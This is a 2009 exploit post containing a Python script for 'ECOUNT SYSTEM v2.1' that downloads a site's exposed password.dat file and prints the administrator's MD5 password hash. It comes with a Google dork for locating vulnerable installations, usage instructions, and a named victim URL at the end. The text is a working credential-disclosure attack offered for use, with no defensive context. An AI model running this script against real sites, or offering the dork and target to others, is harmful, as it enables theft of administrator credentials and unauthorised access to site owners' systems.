ecount-disclose.txt
Posted on 23 January 2009
#!/usr/bin/python #Portal Name: ECOUNT SYSTEM #version : 2.1 #'Google Dork : ECOUNT SYSTEM v2.1 #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me : Pouya.s3rver@Gmail.com #Ecount system login page = www.site.com/[Path]/admin.php import urllib import sys import parser serv="http://" i=0 for arg in sys.argv: i=i+1 if i!=3: print """ Ecount System (password.dat) Usage:exploit.py [targetsite] [path] Example:exploit.py www.target.com /Path/ Result= Admin Pass [MD5]" """ else: adres=sys.argv[1] path=sys.argv[2] str1=adres.join([serv,path]) str2=str1.join(['','/password.dat']) print " [~]Connecting..." url=urllib.urlopen(str2).read(); print " [+]Connected!" test=url.find(path); t=0; print " -=[Admin Password]=-" while(url[test+1]!=1): # Pouya print url[test], if(url[test]==' '): t=t+1; if(t==2): break; test=test+1; print " [ coded by Pouya_Server ]" ------------------------------------------------------------------------------------------ Victem : http://tdband.com.ua/click